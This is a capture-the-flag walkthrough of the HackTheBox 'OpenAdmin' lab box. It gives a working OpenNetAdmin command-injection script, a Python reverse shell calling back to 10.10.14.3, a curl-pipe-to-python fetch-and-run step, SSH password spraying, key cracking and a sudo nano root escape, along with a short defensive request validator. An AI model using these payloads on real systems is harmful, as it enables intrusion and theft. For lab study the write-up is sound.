OpenAdmin
An easy Linux box from HackTheBox, using an exposed admin panel for initial access, then pivoting around between users, until getting root with an SUID binary.
Recon
Starting with nmap
nmap -sV -sC -oA initial 10.10.10.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Also ran an all-ports scan (-p-) in the background while working on the box, but nothing new showed up
Searching for Apache 2.4.29 on Launchpad shows the box is relatively new: Ubuntu Bionic
Navigating to the HTTP server on port 80, all that it shows is the default Apache page
Welp, let's hit it with gobuster
gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Find a few interesting directories, /music, /artwork and /sierra
Of these three, /music has a login button, that immediately dumps you into an administrator panel called OpenNetAdmin
Exploitation
For this particular version of OpenNetAdmin there is a command injection exploit abusing the admin panel's ping functionality
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The above script, when run with the target URL and given the command you want to inject, executes that command on the server
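The root cause is that the ping tooltip hands the ip=> value to a shell without checking it. As an added example (not the exploit script above and not OpenNetAdmin's own code), here is the request-body check a validating front end could apply: it parses the xajax window_submit call, accepts only a bare IP address as the ping target, and flags the payload shape used above. It assumes the argument carries a single ip=>value pair, as in that payload, and the sample bodies are constructed for the example.

```python
import ipaddress
from urllib.parse import parse_qs

# Constructed sample request bodies (not captured traffic). The first mirrors the
# shape of the injection payload in the exploit script, with the injected command
# replaced by the harmless placeholder "id"; the second is what a legitimate ping
# tooltip request for a real host looks like.
INJECTED_BODY = (
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping'
)
BENIGN_BODY = (
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.10.171&xajaxargs[]=ping"
)
SHELL_METACHARS = set(";|&`$()<>\n")

def parse_window_submit(body):
    """Return (window, argument, action) from an xajax window_submit body, else None."""
    # Split only on '&': the injected value contains ';', which older parse_qs
    # defaults would also have treated as a pair separator.
    params = parse_qs(body, keep_blank_values=True, separator="&")
    if params.get("xajax") != ["window_submit"]:
        return None
    xargs = params.get("xajaxargs[]", [])
    if len(xargs) < 3:
        return None
    return xargs[0], xargs[1], xargs[-1]

def inspect_ping_request(body):
    """Classify one request body: 'not-ping' (outside this check), 'ok' (bare IP
    target), 'shell-metachar' (target could break out of a shell command) or
    'bad-target' (anything else that is not an IP address)."""
    parsed = parse_window_submit(body)
    if parsed is None or parsed[0] != "tooltips" or parsed[2] != "ping":
        return "not-ping"
    key, sep, target = parsed[1].partition("=>")  # assumes a single ip=>value pair
    if not sep or key != "ip":
        return "bad-target"
    if SHELL_METACHARS & set(target):
        return "shell-metachar"
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return "bad-target"
    return "ok"

def flag_injection_attempts(bodies):
    """Return (body, verdict) for every request that should be blocked and alerted on."""
    flagged = []
    for body in bodies:
        verdict = inspect_ping_request(body)
        if verdict not in ("ok", "not-ping"):
            flagged.append((body, verdict))
    return flagged
```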
Starting up a netcat session on port 1234, the payload will be a reverse shell
Copying the exploit into ona_inject.sh, but appending -x http://127.0.0.1:8080 to the curl call to send the exploit's requests through Burp Proxy (just to make sure it's working)
#!/bin/bash
URL="${1}"
while true;do
    echo -n "$ "; read cmd
    curl -x 'http://127.0.0.1:8080' --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
And run it like so
./ona_inject.sh 10.10.10.171/ona/
Really weird box, hard to get a reverse shell on it
Need to use this Python reverse shell (minus the python -c at the front), saved into a file called rev.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Curl it from the server (served from a simple HTTP server on the attacking machine) and pipe it into python3 server-side
curl 10.10.14.3:8000/rev.py | python3
Run linPEAS.sh by wget'ing it from a simple HTTP server; don't really find anything besides 2 user names, jimmy and joanna
Looking through the config files in the /opt/ona/www/ directory recursively with grep -R, find a file called database_settings.inc.php which leaks the MySQL user and password
'db_login' => ona_sys
'db_passwd' => n1nj4W4rri0R!
And log in to the MySQL instance
mysql -u ona_sys -p
Running show databases
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ona_default |
+--------------------+
2 rows in set (0.00 sec)
Navigating into ona_default
use ona_default;
show tables;
There is a users table; running "describe users;" gives
+----------+------------------+------+-----+-------------------+-----------------------------+
| Field | Type | Null | Key | Default | Extra |
+----------+------------------+------+-----+-------------------+-----------------------------+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| username | varchar(32) | NO | UNI | NULL | |
| password | varchar(64) | NO | | NULL | |
| level | int(4) | NO | | 0 | |
| ctime | timestamp | NO | | CURRENT_TIMESTAMP | on update CURRENT_TIMESTAMP |
| atime | datetime | YES | | NULL | |
+----------+------------------+------+-----+-------------------+-----------------------------+
Then printing the user info with “select id,username,password from users;”
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | guest | 098f6bcd4621d373cade4e832627b4f6 |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
Running the hashes through hash.org gives the creds
guest:test admin:admin
But these are just creds for the OpenNetAdmin instance
Let's combine all the passwords we have into a list and try each password against each of the known users
Passwords: admin test n1nj4W4rri0R!
Users: jimmy joanna root
Using a tool called medusa, let's try to SSH into the box as each user
medusa -h 10.10.10.171 -U users.txt -P pass.txt -M ssh
We get in as jimmy!
jimmy:n1nj4W4rri0R! are his creds
Looking into the (previously locked to us) home directory, it's empty, bummer
Let's try finding all the files owned by jimmy with
find / -user jimmy 2>/dev/null
Find some curious php scripts, one called main.php in /var/www/internal/
Cat'ing it, find that it just reads out joanna's SSH key
Maybe there is another webserver running?
ss -lntp
Find there is a process listening on port 52846 that only accepts connections from localhost
So to see joanna's SSH key, need to request the PHP script with curl from jimmy's shell
curl 127.0.0.1:52846/main.php
And it prints the SSH key out. Unfortunately, a passphrase is required for the key when you try to SSH into the box as joanna
Gotta crack it with john
# First, turn the key into a john-compatible hash
python ssh2john.py joanna_id_rsa > joanna_id_rsa.hash
Finally, let's use john and rockyou.txt to try and crack the SSH key.
john joanna_id_rsa.hash --wordlist=rockyou.txt
The passphrase is “bloodninjas”
Now can SSH in as joanna, and find the user flag
Running sudo -l, find that joanna can run /bin/nano on /opt/priv as root without a password
Looking at GTFOBins, can get a shell through nano by editing the only file you are allowed to open with sudo, /opt/priv
sudo /bin/nano /opt/priv
Then, following the GTFOBins instructions inside nano
nano
^R^X
reset; sh 1>&0 2>&0
And you're root!